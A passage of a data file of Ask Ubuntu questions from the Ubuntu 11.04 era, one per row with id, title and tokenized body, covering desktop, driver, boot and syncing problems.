notification-audio-volume-medium '' while the notification would listen for this signal and react accordingly . if the sending / receiving would be public rather than private , would n't it allow for more flexibility and efficiency ? for instance if there was a public signal for `` notification-audio-volume-medium '' then several applications could listen for this signal ( which would allow for competing notification applications to come to existence ) and developers would just have to be concerned with sending signals , while picking up and handling a signal would be the notifying application 's business ( or any other program that needs those signals ) . i 'm just new to dbus and want to learn more as i am working with dbus on python , mainly to develop some applets . i 've seen the dbus-python tutorial and it teaches how to listen to all signals ( by specifying neither interface nor path etc . ) but how to track methods when they are called , like dbus-monitor does ? if you have the patience to teach how that works , you 're welcome . thanks . benjamin
38736	can i sync folders from a fat32 partition with ubuntuone ?	can i sync folders from a fat32 partition with ubuntuone in natty ?
38743	hidden files are shown in dash	i have several hidden files in a folder that are private and need to remain private . i do not mind people seeing what i do on my system but after i open one of these files i can find them through dash and i can even open them . am i misunderstanding the usage of hidden files ? can i tell dash to exclude hidden files ?
38749	how to easy change some colors with special theme ?	i use auroramint as my themes , but some colors mess up my opera . when i use gnome-appearance-properties - > customize theme - > colors , i only can found input boxes ' text color here . but i still want change background colors in email list ( opera use gtk theme here ) . gui give only 4 group colors here , so poor . gtkcolorscheme=fg_color : # cbf6d4d4bf8c , bg_color : # 311133332e14 , text_color : # 8713a9515723 , base_color : # 444f47474026 , selected_fg_color : # f554ffffe666 , selected_bg_color : # 9797bfbf6060 , tooltip_fg_color : # 000000000000 , tooltip_bg_color : # f5f5f5f5b5b5 i thought maybe some software can use mouse click to found out widgets under mouse point , for i does not know which widget is email list used ( if i change gtkrc file ) .
38750	custom dpi settings in kde	how can i set a custom value for font dpi in kde ? the only options available in kde are 96 and 120 dpi values . my screen resolution is 1920*1080 , so i would like to keep the dpi at a value higher than 120 . i know how to do this in gnome . could any one tell how to set custom dpi values in kde ? a gui method is preferred
38753	multiple monitors , different resolutions break maximize button	after installing 11.04 i noticed that the maximize button is broken with multiple monitors at a different resolution . when clicking on maximize on the screen with the lowest resolution , the titlebar of the application gets hidden under the top-panel and the application is resized to half of the screen . this is an extremely annoying issue . before maximizing : after maximizing :
38755	maximum file size on ubuntu one ?	i 've uploaded two .rar files ( 3.0 gb each ) to ubuntu one ( of course , i 've got a +20gb plan ) , published at http : //ubuntuone.com/p/pi0/ & http : //ubuntuone.com/p/pi1/ . why does it show a 500 internal server when trying to download ?
38757	ugly font after kde installation	you all know the nice default font that come with ubuntu , right ? i just wanted to play a little bit with kubuntu and installed the meta package kubuntu-desktop everything was fine , however the font is now ugly as hell . not only on kde , but also on gnome , unity etc . example : how can i get the default font config back ?
38758	nautilus does not start from top menu	i am experiencing very strange problems with nautilus in my ubuntu linux . when i go to places and click home folder ( or any other nautilus item , a bookmark , for example ) , nautilus hangs at the bottom for a while and the dissapears - nothing gets opened : however , if i type nautilus in command line , or open a folder from the desktop , everything works fine . i can not recall when it has started , but it gets quite inconvinient . what could be causing this behavour ? if it 's hard to tell , then how can i diagnose/debug the problem ? i have used 10.10 and recently upgraded to 11.04 ( it did not solve the problem ) thank you !
38765	dist-upgrade to natty set gnome theme to old gtk look	on dist-upgrade to natty there was some message about gtk and the gnome look was set to the old gtk style . how to check the cause of that ? i am not sure what to look for in /var/log/dist-upgrade could anyone give a hint please - ie . what packages are responsible for the theming ?
38767	how to install android sdk ?	how to install android sdk from android-sdk_r10-linux_x86.tgz in ubuntu 10.10 for using in eclipse ide ?
38770	overlay scrollbar for chromium browser	will chromium browser ever get overlay scrollbar ? like this :
38772	what lenses for unity are available ?	this question is present as a matter of historical interest . while you are encouraged to help maintain its answers , please understand that `` big list '' questions are not generally allowed on askubuntu and will be closed per the faq . what lenses are available for unity ? if the lens has ( a ) scope ( s ) remember to add them to your answer as well .
38775	bittorrent magnitudes slower in 11.04 than in 10.10	i 'm running into a very strange issue related to bittorrent . back in maverick , i could download at about 2mbps per torrent . now , i 'll be lucky to get to 100kbps . not only that , but any other network access slows to a crawl as soon as i start downloading something . at first i thought it might be my router that was being overwhelmed with all the connections , but i checked my settings and saw that i had already set the global connections limit to 200 , and a per torrent setting of 50 . i 've been able to have a much higher limit in the past , so that should n't be it . any ideas on how to troubleshoot this ? edit : to add to the mystery , i 'm now using another computer with natty on . i 'm using the same torrents with the same bittorrent client and the same settings , and now it 's working beautifully .
38776	trigger screensaver/off monitor	is it possible to somehow trigger screensaver or make the monitor sleep/off ? i want to disable screensaver/monitor sleep as it gets annoying at times , however i still want a way to save power via such methods
38778	checksums do not match when creating a bootable usb stick	since karmic koala , i ca n't create a bootable usb . always the same error , it arrives to 96 % and then this error `` checksums do not match '' . also in lucid , meerkat and natty even with fresh install . tried it with more than usb stick . am i doing somthing wrong ? i did format the usb stick several times but no luck . it 's 2gb . now i lost my dvd drive on my laptop , and usb is my only option . please help ! i did try different usb sticks i did try unetbootin , with success , but when booting from usb and selecting check disk for errors within the unetbootin menu it gives me 1 error , so i did n't try actually to install the o . s for precaution reasons . i did try to launch disk creator from terminal with sudo and that gives the same error on 96 % of the process . doing the check proposed by chen xiao-long , the codes result no match . suliman @ suliman-laptop : ~ $ sudo mount -o loop /home/suliman/documents/ubuntu-11.04-desktop-i386.iso /mnt . [ sudo ] password for suliman : suliman @ suliman-laptop : ~ $ md5sum /mnt/casper/filesystem.squashfs 174bb50daab963e681d2dcd9603f737b /mnt/casper/filesystem.squashfs suliman @ suliman-laptop : ~ $ md5sum '/media/8be1-c58a/casper/filesystem.squashfs ' e4129f8ff21860d978c911b3b394f807 /media/8be1-c58a/casper/filesystem.squashfs edit 2 5. if the usb port is faulty , how can i check that ?
38780	how do i set 'nomodeset ' after i 've already installed ubuntu ?	i know that editing the boot options line and adding 'nomodeset ' solves my laptops problem during livecd mode , what i do n't know is how to set it at boot up through grub2 after i 've installed ubuntu . so , my question is , how do i set nomodeset before i boot into ubuntu ?
38783	is there a desktop-wide privacy mode ?	with zeitgeist now tracking everything i really think we need a privacy mode like the one firefox offers . there is a ridiculous amount of history and caches being stored in ubuntu from thumbnails to file history . and god forbid you install a kde application in gnome , then you get even more file indexers and recently used tracking ! is there a way to clear everything ? even better would be a way to run the os in a privacy mode that never even wrote to the disk . how can i disable all caching and thumbnailing and history in the os ? firefox provides private browsing . ie only allows you to delete the cache when you close ie . firefox wins ! can i get a private session in ubuntu ? also , my company would like to run ubuntu off an sd card . limiting the number of writes to update a cache , history or log would be a really good idea . switching back and forth would be perfect . right now zeitgeist is working on a way to clear history , but come on , can we have an option to not write a history at all ? am i missing something here ?
38784	how do i copy music from ipod nano to computer ( banshee )	i have a fresh install of ubuntu 11.04 . my nano syncs fine with banshee . how do i copy the music already on the nano onto my computer ? there does n't seem to be an option to do this within banshee . also if i open the nano in nautilus no music files show up to copy .
38788	what does `` md value mismatch_count '' count ?	since upgrading to 11.04 i have been trying to get my 5 disk raid5 array back online . the array was initially split in two , i tried to use a create command with the assume clean option to get it back into a single array . i think this did more harm than good because the mdadm default is now to use the 1.2 rather than 0.90 metadata format which i believe caused the metadata to be written over some of my data . this brought into doubt the disk ordering i thought the array should have as this order will not result in a mountable drive so i used a script to test every possible ordering of the five disks and none of them mounted , i then tried the same process only instead of mounting i ran an xfs_check and then a targetted xfs_repair ( with the -n option to prevent any actual edits ) . all this got me down to a reasonably small collection of disk layouts but i obviously only get one change to try the xfs_repair and the data is far to large to try an backup so i thought having the array run a parity check would be a good idea , i started out with the two array disk orderings i thought most likely to be correct ran check and as it turns out they both had exactly 8 for a mismatch_count and those 8 were discovered almost instantly . how is this possible ? the two disk orderings are very different ( acbde vs adcbe ) ... is it possible disk order will have no effect on a parity check ? just on the actual underlying data ? if so it might be reasonable to try to run a repair on the array from one of these layouts and then recheck the file-system to see if it can now mount ... but i am hesitant to do so as it would be the first step i have taken that intentionally writes more than metadata to the disks .
38789	how do i add and remove the workspace switcher launcher from the unity launcher ?	how can i remove the workspace switcher launcher from the unity dock ?
38792	installer always sets the wrong locale	i always assumed the system locale was set based on chosen time zone , but that does n't appear to be the case . i choose detroit for my time zone ( or new york , i 've done both ) , but ubuntu always sets my locale as en_ca , and points me to a canadian mirror for apt on a fresh install . how is locale chosen ? how can i make sure my locale is set to en_us ? will that get my apt respositories back to a us mirror ? note : i know how to change my locale , my question is specifically about how to make sure it 's set properly on install .
38797	keyboard not working after suspend to ram ( sleep )	on a sony vaio vgn cs21s the keyboard doesnâ´t work after suspend to ram . suspend to disk ( hibernate ) works though . running a fresh install of natty with unity .
38801	how do i set the number of workspaces without ccsm ?	it 's been an issue for quite some time to set the number of different desktops ( or workspaces if you like ) in the new ubuntu natty narwhal ( using unity ) . some guys figured out a way to overcome it by using the compiz-config ( ccsm ) . for some reason it seems that the ccsm does n't really work for me . i change the number of desktops , and the expo but it wo n't work .
38802	nautilus is theme-less unless i run it as root	my system is using the ambiance theme in ubuntu natty . everything works correctly except for nautilus , which appears to have been deprived from its theme . can anyone help me restore it to the default ambiance theme ? ( i 've tried setting other themes but nautilus is still grey ) if i open nautilus with 'sudo ' from the terminal , this bug is n't present and the theme is shown correctly . i thought the desktop forgets theme ? answer would solve my problem , but after restarting , the theme-less nautilus is back . something i noticed is that this problem is present in nautilus and with nautilus only . as i said , if i run nautilus as root the problem is n't present , only when running nautilus as a normal user
38807	what is the best desktop/screen recorder	hello to all i am trying to record my and the first time i tried desktop recorder and when it came out ( witch took all night ) it was all pixiness and barely could see anything so i am out to look for a good screen recorder to use
38810	why does n't unity use gnome-panel ?	i have n't been able to google up any info on this : why does n't unity use gnome-panel ? unity 's panel has no functionality that ca n't be implemented on top of gnome-panel ( witness previous versions of ubuntu netbook ) . the new panel is missing a bunch of features ( chiefly system monitors and a decent clock applet ) , and since gnome-panel applets are n't supported , we 'll have to wait for entirely new stuff to be written -- in an environment , i understand , that is too crippled to be able to design nice meters and such .
38812	11.04 unity top bar configuration	hi all , is there any way to modify the top bar behaviour in unity ? as i have read around - not ... what i 'm looking for is : i want to see the `` file , edit , view , ... '' menu all the time instead of the filename title in it ... filename title is really useless ... any help with this ? thanks
38819	how do i add a name to a launcher ?	i added application to launcher like this . i run it from command line , then when icon appeared in launcher , i right clicked it and checked `` keep in launcher '' . it works fine , but i 'd like to add name to this launcher icon . when i hover over some other icon in the lanucher , a name appears . on icon i added there is no name . how can i add one ?
38820	plymouth main process killed by segv signal error on boot	after upgrading to 11.04 the following messages appear , i do n't know what to do about it . pls suggest . init : plymouth main process ( 68 ) killed by segv signal init : plymouth-splash main process ( 193 ) terminated with status 2
38823	how to use apt-get/synaptic behind a proxy ?	i use net connection that needs proxy , user name and password , i can access to the net by firefox , but i ca n't update my system or use ubuntu software center . i setup the proxy and username/password in synaptic and in network proxy and i edit apt.conf bu this command : sudo gedit /etc/apt/apt.conf but update dos not work i already did the steps mentioned in the answer about the ubuntu forums posts . how to use apt-get/synaptic behind proxy ?
38824	your disc drive being checked for errors ?	i 'm getting this massage ever login in my ubuntu os . the message `` your disc drive being checked for errors . this will take some time . '' followed by this message `` checking.. 3 % '' progress . press c to cancel . what is the problem in my disc ? is it normal for all ubuntu os ? is there any issue ?
38826	centrino wireless-n 1000 poor performance on n network	everything worked fine in previous ubuntu 10.10 . i installed new natty 11.04 and wireless started behaving poorly . the performance is so random , sometimes it works fine and sometimes , all it does is connect to the wireless ap and just stall . doing a ping 192.168.1.1 ( ap address ) results in 50 - 90 % packet loss . i found http : //ubuntuforums.org/archive/index.php/t-1592846.html and the proposed solution helped . sudo rmmod iwlagn sudo modprobe iwlagn 11n_disable=0 and to permanently fix this , i just created /etc/modprobe.d/intel-centrino-n1000-iwlagn-enable11n.conf with following line . options iwlagn 11n_disable=0 things seem to work fine now . wlan0 ieee 802.11bgn essid : '' sthawifi '' mode : managed frequency:2.437 ghz access point : 00:23 : cd : f0:17 : e2 bit rate=150 mb/s tx-power=14 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=70/70 signal level=-35 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:435 invalid misc:58 missed beacon:0 my question , does anyone else have this issue ? and is there a better fix for this ? edit : no i still do not have a stable connection with the settings above ? has anyone had good experience with n network ? also , i figured , in 10.10 the n network was disabled . doing the same in natty with /etc/modprobe.d/iwlagn.conf options iwlagn 11n_disable50=1 11n_disable=1 stabilizes the network , but can only get g connection . help ?
38829	how can i report a bug when ubuntu-bug crashes ?	how can i report a bug when ubuntu-bug crashes ? ongun @ ongun-ubuntu : ~ $ ubuntu-bug python error : /etc/apport/crashdb.conf is damaged : no default database
38830	does unity have any widgets ?	while upgrading to ubuntu 11.04 , my google-gadgets framework was removed . i thought at the time this is because it 's deprecated because there 's some alternative integrated in the new unity framework , but i could n't find any . are there any rss/clock/etc . widgets in unity ? if not - why did the upgrade uninstalled my google gadgets app ? what do i do now ? thanks .
38831	how to remove the nautilus alert of ubuntu one to synchonize folders ?	see the link image of ubuntu one warning highlighted but do n't remove the sync of `` ubuntu one '' folder .
38832	boot cd fails while starting installer	yesterday i tried installing ubuntu 11.04 , so i started my pc with the ubuntu 11.04 start cd . unfortunately , during the starting process of the installer ( after choosing install ubuntu from the start menue ) , the process seems to fail . after some print outs ( e.g . permission denies ) , i get thrown to the busybox console . i already tried : checked the checksum of the download burned the image on a different cd changed ahci to ide in the bios using the boot parameter all_generic_ide somebody got an idea whats wrong here ?
38835	is there a way to copy-paste text into unity 's new 'alt+f2 ' launcher ?	when i try to copy/paste text , it always comes up with that square with 4 characters inside of it . sometimes i do n't want to launch something in a terminal ( e.g . conky ) , and not being able to copy/paste into the alt+f2 dialog makes it difficult - especially if i have to type in a long file uri . i used to use gnome-do and synapse for this but am trying to give unity a chance..
38840	is it possible to make grub2 look similar to burg ?	i would like to stick to grub since it seems to be more actively developed and the entries are automatically updated after a kernel update . however i love the look of the burg themes ( especially sora_clean ) . are there themes available for grub2 which have a similar look ? i especially would like a `` folded view '' , showing only one entry per os ( by default ) , and a the installed oses being shown as symbols , instead of listed text . i would also be grateful for installation instructions along with the theme suggestions .
38845	samsung netbook n150plus screen brightness not working	i have a samsung netbook n150plus ( mod # np-n150-jp02uk ) on which i have just installed 11.04 but although the function key works for the screen brightness and brings up the brightness +/- animation , it does not actually change the brightness . with power on , the screen is bright but at least i can see it ( but not change it ) but on battery power , the screen is so dim its almost unusable in normal daylight . i have made changes to power management to no avail . also had the same issue when i had 10.10 installed before upgrading . is this a driver issue of a linux setting problem ? any help appreciated .
38846	which media player should i use for tv series ?	i want to watch tv series i have as video files on my computer ( i.e . ripped from dvds i own ) , whilst keeping track of which episode i 've already seen . i 'm perfectly comfortable with using nautilus for browsing my directory structure but would also accept some database driven player . what are my options here ? i 've tried banshee and xmbc/boxee . while banshee did n't look nice at all , xbmc and boxee nicely scanned my drive , put cover art in its overview screen etc . but i feel it 's not really useful in my situation where i sit in front of my computer doing other things and want to watch movies/series on my second screen
38848	why do n't my external usb hard disks umount when i shutdown ?	i have an usb external disk and i spin-down it through `` hd-idle '' , a utility i found here : http : //hd-idle.sourceforge.net . i thought that when ubuntu shutdown , it unmount all partitions , whether these belong to internal or external hard drives . i noticed , instead , that if an internal drive is in standby , this is awakened at the time of the system shutdown ( probably just to unmount any partitions mounted on that disk even if it does so when there are no partitions mounted , and in fact in my opinion , it would also be preferable if in this case it remain off ) but the same does n't occur for my external hard-drive . this let me think that `` external '' partitions are not correctly unmounted . anyone knows why this happens ?
38849	laggy file manipulations with unity	i just upgraded to ubuntu 11.04/unity , and every file manipulations just feel very laggy ( at least one second ) : selection drag and drop even folder browsing my hard drive is ok , i 'm using the proprietary ati driver , everything runs fine in every other os i have installed except ubuntu since the upgrade . am i the only one seeing this ?
38853	is the nvidia geforce 7300 le blacklisted ?	i have a geforce 7300 le . is that blacklisted in natty ? are there any video card checking utilities available that will check compatibility with natty before downloading/installing ? i want to make sure it works before i download .
38855	`` applications '' launcher not showing , alt-f2 not working	i have just installed ubuntu 11.04 on my acer 3810t . unity is showing only few launchers in the sidebar and the `` applications '' launcher is not there . more , if i press alt-f '' , not windows ( lens ) comes up . where should i troubleshoot this ? thanks ps : video card : intel mobile 4 series chipset
38858	messed up with unity & compiz	i was making some changes in ccsm and i activated `` rotate cube '' plugin which asked me for resolving some conflicts & disabled all of them but with 11.04 something related to unity were also disabled . i tried to restore it to defaults and then it all got screwed up . and now if i am using the new unity login , i just end up with my desktop , stuff on desktop and a mouse cursor . i am able to go to terminal ( tty ) ctrl + alt + f1 but i am not sure what i need to do to fix it . i want the settings to be what they were on a fresh install .
38859	nvidia geforce go 7300 automatically removed from blacklist when problems are solved ?	just a short question : will we get an in formation when the issue with nvidia geforce go 7300 is fixed , resp . will the card removed automatically from the blacklist during the bugfix-update ? thank you in advance .
38860	problems with my bluetooth indicator	i have a weird behavior of my bluetooth indicator , which does not allow me to use my bluetooth device . when i plug-in my trendnet tbw-107ub in my acer extensa 5635 with ubuntu 11.04 , the indicator correctly appears ( gnome-bluetooth ) . but when i click on it , the only three lines that appear are bluetooth : on ( in gray ) turn off bluetooth preferences though i should see other lines like `` visible '' for instance . i tried preferences , but it claims that `` bluetooth is turned off '' , and clicking on the big button `` turn on bluetooth '' has no consequence . how do i make my device work ? thank you for your answers , dear community .
38862	how do i reenable unity after reinstalling the nvidia drivers ?	yesterday i upgraded to 11.04 and i found out the new linux kernel 2.6.38 did not work . the maverick kernel however did . searching at askubuntu i found some tips which suggested to disable quiet splash in the grub config ( /etc/default/grub ) . i supposed it had something to do with the video driver , so i disabled the nvidia proprietary driver and rebooted . this did n't really work and eventually i ended up with a the non-graphical tty1 . with startx i tried to start the graphical environment again , but this resulted in an error like : failed to load module `` nvidia '' ( module does not exist , 0 ) after that i booted in recovery mode and reinstalled the nvidia driver again , after the classic gnome worked again , but unity does n't work yet . also in classic all ( compiz ) effects are disabled . i guess i have to get that working again and unity will work after that too , question is : how ?
38864	unity mail applet	i 'm new here and started using unity just 4 days ago . i have used docky and awn before . i mean i do n't need all that neat stuff , but just the mail applet . just to be in touch with mail . is there any way to be do this in with the unity panel ?
38866	is it possible to install ubuntu on the asus transformer ?	i am planning to buy a netvertible ( tablet netbook hybrid ) and install ubuntu 11.04 on it , probably as a dual boot with the shipped os . the asus transformer which was just released looks really nice . is it possible to install ubuntu on it ? if so , what works ( out of the box or through work-arounds ) , what does n't ?
38869	how do i enable mouse scroll wheel zoon in flash screen ?	i have just installed ubuntu . i have a logitech m305 mouse . the mouse works fine in most applications . when i try to use the mouse wheel to zoom while using a flash application nothing happens . i have tried using the wheel in combination with various keys , such as ctrl , alt , shift and combinations of those keys , and no luck . is there anything i can do to get this working . am using chromium with adobe square .
38871	vimperator not working with firefox 4 from official repository	as the title says , with ubuntu 10.10 and firefox 4 from ppa it was working fine , any suggestions or is it a bug ?
38874	is there a way to show a list of minimized windows in unity ?	i know how the unity dock works and i like it . but i need a fast tool to list all the opened windows instead of looking at the dock and find out which of those have a backlight arrow sign ... is it possible ?
38883	what should i do if lsusb hang without any output ?	while diagnosing a problem with lirc i tried to list the usb devices on my system by running lsusb and it simply hang there without displaying anything . i ca n't even close it with ctrl+c , i have to close the terminal i launch it from . i guess it means there is something wrong with the usb `` system '' and that 's why my ir receiver does n't work . i searched on the web and did not find much about this problem . what should i try to diagnose this ?
38886	program to compare two files line by line	is there a gui-based program on ubuntu that compares two files line by line and indicates where two lines do not match ? if not , any console app that does the same thing ?
38890	monitor never goes to sleep	am running natty with unity 2d
38893	11.04 much slower than 10.10	i 've tested ubuntu 11.04 clean installs in two computers , an eeepc netbook and a hp pavilion t3010.es , which is an old desktop computer ( 6 or 7 years ) with the specs of a netbook approximately . the issue is that 11.04 runs on these two much slower than 10.10 did , almost as windows 7 in the desktop pc . by slower i consider a general decrease on the overall performance : longer boot time , longer log in , longer startup time on almost every application i use ( chromium , nautilus , banshee , ... common use ones ) , much longer update time ... i tried both unity and classic desktop modes , with barely no difference in performance on both . is this normal ? thanks !
38896	disable accessibility in login screen	there 's a funny joke going through my class : wait for a colleague to leave his laptop and restart the laptop / change user . then , at login screen ( gdm ) , enable all possible accessibility features and enjoy an unusable laptop ... is it possible to hide the little accessibility icon at the lower right edge ? i 've once tried to change the theme somehow , but did n't succeed . thank you tom ps : yep , i was the first to do that funny joke . : )
38897	random `` freezes '' ( only mouse cursor moves )	okay . so i did a clean install of natty yesterday . the problem is that it freezes randomly . i can still move my mouse , but not do anything . i can also go into the terminal , but doing a gdm restart does n't help either ( makes the terminal running the gui display some info about how it shut down the network manager ) . so is there a way of solving this ? thanks in advance . edit : as suggested , filed a bug report : https : //bugs.launchpad.net/ubuntu/+source/xorg/+bug/775060
38902	how can i set up grub to recognize an encrypted windows partition ?	my work laptop has an encrypted windows 7 installed . i just installed ubuntu 11.04 at another partition . grub did not recognize my windows installation . so , as i boot , there is no option to boot it from the windows ( currently at /dev/sda1 ) . anyone can help me on setting up grub2 to give me the menu with the option to boot from windows ? is that even possible ?
38903	classic desktop combines window title bar with panel making windows unmovable and unresizeable	this problem occurs with ubuntu classic desktop not ubuntu classic ( no effects ) desktop . the windows bear some similarity to maximised windows under the new unity desktop where the top border merges with the bar at the top of the screen . i ca n't stop this effect . launching a new window causes it to appear at the top left of the screen with no top border so i ca n't move it to expose the window below . i have read the post of a similar problem with a netbook under 10.10 where the culprit is a program called maximus . i have tried to find it in the list of processes by ps augx | grep maximus but it is not there ; neither does it appear in the list of start up programs nor the list of current processes in the system monitor . so i guess it is not maximus that is causing the problem .
38904	would a unity lens written for unity 3d also work in unity 2d ?	i am thinking of writing a few lens features to link unity into some business web applications , do i have to target both unity variants separately or can i do one and assume the other will just work ?
38908	how do i use the `` ubuntu one '' folder name in scripts ?	i use ubuntu one to sync a gnumeric spreadsheet . i like to launch the spreadsheet via a script , something like gnumeric /home/daves/data/test.gnumeric the file in question is now in my ubuntu one folder . however i can not use the ubuntu one name in a script as the resulting script when run reports 'no such file or directory ' , presumably due to the space in the name ubuntu one . how can i successfully path this in a script please ?
38911	shortcut to resize a window with my custom dimensions ?	is it possible to set my own dimensions for a shortcut so when i activate it the window to resize to my preferred dimensions ? i like the new shortcuts in 11.04 with the numpads , but i would like for example ctrl+alt+num5 to make the window with a lower hight just like the width .
38914	rename folders to music 's id3 tags ?	anyone know of an application that will rename a folder to the contents id3 tags ? my music directory is a mess with folder names . not a big deal since i use banshee to library everything . i have a fairly large music collection on my main hard drive ( > 140gb ) but i keep id3 tags clean . i 'm setting up an ftp server and it will be impossible to navigate the way the folders are now . in banshee i have 'update file and folder names ' checked under preferences , but the folder names are not being update . even after rescan music library . any idea why ? i can see when i update an album or track it will update the file and folder names and move them from sub-directory i have them in to the music folder . so how can i have my entire library 's folders renamed ? and how can i maintain the subdirectories i have now ? ( such as ~/music/downloads or ~/music/audiobooks ) ( this is less important than just renaming the folders , by the way ) something similar for movies would be cool too .
38917	how can you animate a gif that goes back-and-forth instead of repeating ?	i 'm animating a gif with imagemagick , i 'm doing animate *.jpg , and that repeats the animation . but i would like it to go do `` pic1 , pic2 , pic3 , pic2 , pic1 '' and repeat , so that it goes back and forth . how can that be done , preferably from a cli ?
38918	missing panel after installing unity 2d	i upgraded my netbook from unr 10.10 to natty 11.04 and it was working fine till i decided to install unity 2d . after installing unity 2d i tried to give it a spin and logged out of my session . when i tried to log back using unity 2d , i got just the background . there are no panels and no dock . all my icons are missing . though i know that it is working because i can execute commands using keyboard . now i am trying to reset unity by opening terminal and entering : unity -- reset however , this works , but only till i have the terminal opened . as i close the terminal , it goes back to square one and i am looking at the background with no panels . there is one more thing , this is happening only in one profile . my other user profiles are working fine and i can access and work in them absolutely fine . i believe i have messed up my graphic card settings for my admin profile . i am not sure which graphic card it has ( i am using acer aspire one d250 netbook ) . please help ! here is the output of the unity -- reset command : unity -- reset unity-panel-service : no process found backend : gconf integration : true profile : unity adding plugins initializing core options ... done window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 1 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 window created on xquerytree , map state isviewable ? 0 initializing bailer options ... done initializing detection options ... done initializing composite options ... done initializing opengl options ... done initializing decor options ... done initializing mousepoll options ... done initializing vpswitch options ... done initializing animation options ... done initializing snap options ... done initializing expo options ... done initializing move options ... done initializing place options ... done initializing grid options ... done initializing gnomecompat options ... done initializing wall options ... done initializing ezoom options ... done initializing workarounds options ... done initializing staticswitcher options ... done initializing resize options ... done initializing fade options ... done initializing unitymtgrabhandles options ... done initializing scale options ... done initializing session options ... done ** ( < unknown > :1698 ) : debug : unity accessibility initialization ** ( < unknown > :1698 ) : debug : shows on edge : 1 screen geometry changed : monitor 0 ( primary ) 0x0x1024x600 unity-panel-service : no process found ** ( < unknown > :1698 ) : debug : panelcontroller : : added panel for monitor 0 initializing unityshell options ... done ** ( < unknown > :1698 ) : debug : maximizeifbigenough : gnome-terminal window size does n't fit ** ( < unknown > :1698 ) : debug : placeentry : files & folders ** ( < unknown > :1698 ) : debug : placeentry : applications ** ( < unknown > :1698 ) : debug : placeentry : commands ** ( < unknown > :1698 ) : debug : /com/canonical/unity/applicationsplace ** ( < unknown > :1698 ) : debug : /com/canonical/unity/filesplace ** ( < unknown > :1698 ) : debug : setting to primary screen rect : x=0 y=0 w=1024 h=600 ** ( < unknown > :1698 ) : debug : acquired the name com.canonical.unity.launcher on the session bus ** ( < unknown > :1698 ) : debug : traychild rejected : gst-keyboard-xkb gnome-settings-daemon gnome-settings-daemon ** ( < unknown > :1698 ) : debug : traychild rejected : nm-applet nm-applet nm-applet ** ( < unknown > :1698 ) : debug : traychild rejected : gnome-power-manager gnome-power-manager gnome-power-manager ( < unknown > :1698 ) : glib-gobject-critical ** : g_object_unref : assertion `g_is_object ( object ) ' failed ** ( < unknown > :1698 ) : debug : indicatoradded : libapplication.so ** ( < unknown > :1698 ) : debug : indicatoradded : libsoundmenu.so ** ( < unknown > :1698 ) : debug : indicatoradded : libmessaging.so ** ( < unknown > :1698 ) : debug : indicatoradded : libdatetime.so ** ( < unknown > :1698 ) : debug : indicatoradded : libme.so ** ( < unknown > :1698 ) : debug : indicatoradded : libsession.so setting update `` run_command_terminal_key '' setting update `` fullscreen_visual_bell '' ** ( < unknown > :1698 ) : debug : traychild rejected : update-notifier update-notifier update-notifier ** ( < unknown > :1698 ) : debug : traychild rejected : update-notifier update-notifier update-notifier ** ( < unknown > :1698 ) : debug : traychild rejected : update-notifier update-notifier update-notifier
38920	boot splash broken by `` sp5100 tco timer : mmio address 0xyyyyyyy already in use ''	i have ubuntu 11.04 with all the latest updates . i have an ati hd 4350 graphics card and the `` ati/amd proprietary fglrx graphics driver '' activated . the reported behaviour does not affect the functionality , its just an optical thing . when i booted up using the desktop cd , the ubuntu boot splash was shown correctly in high resolution . now after installation with fglrx the dipsplay is broken ( see picture ) . http : //img824.imageshack.us/img824/7269/tcotimer.jpg this is what can be found in dmesg [ 8.621803 ] sp5100 tco timer : sp5100 tco watchdog timer driver v0.01 [ 8.621967 ] sp5100 tco timer : mmio address 0xfec000f0 already in use [ 8.622650 ] fglrx : module license 'proprietary . ( c ) 2002 - ati technologies , starnberg , germany ' taints kernel . [ 8.622656 ] disabling lock debugging due to kernel taint this is what mmio means : https : //en.wikipedia.org/wiki/memory-mapped_i/o any idea how to get back the high-res splash ?
38921	why i get a bad gateway error when trying to access u1 contact 's webui ?	webui in one.ubuntu.com works well for notes and files . everything syncs fine and i can modify everything without problems . also the status page of u1 servers says everything is ok . but when i 'm trying to access the contacts tab i get this error : 504 gateway time-out the server did n't respond in time . this happens for the past week or so ...
38926	reading logs after i 've had to hard reboot	i have a vga to s-video converter which i use to watch movies on the tv from my laptop , but after i 've plugged it the laptop starts freezing whenever i try to suspend it or hibernate it . can i read some log files to see what is causing this problem ?
38929	libreoffice shows many icons on the launcher , what can i do about this ?	when i run libreoffice it shows another icon at the launcher . if i open new files it will keep showing new icons for each file . when i run it from the terminal it does not return any error messages . here 's the image :
38933	how is a unity lens different from google desktop ?	from google desktop features page : google desktop is a desktop search application that gives you easy access to information on your computer and from the web . desktop makes searching your own email , files , music , photos , and more as easy as searching the web with google . from what exactly is a `` lens '' ? lenses are elements of the unity dash that provide a ui to search both the web and application data . in particular , how are the privacy policies and exposure of any personal data to either canonical or google different ? i have not used either one of these and my first step would be to find out more about what personal data is exposed .
38940	why is scrolling in chromium super-smooth with openbox but not with compiz ?	i have an extension for chromium called smooth-scroll . while i use openbox the scrolling is noticeably smooth with some thin ripples . compiz is much more jerky . this is with chromium 10 ; 11 has n't dropped yet and is supposed to have accelerated layers .
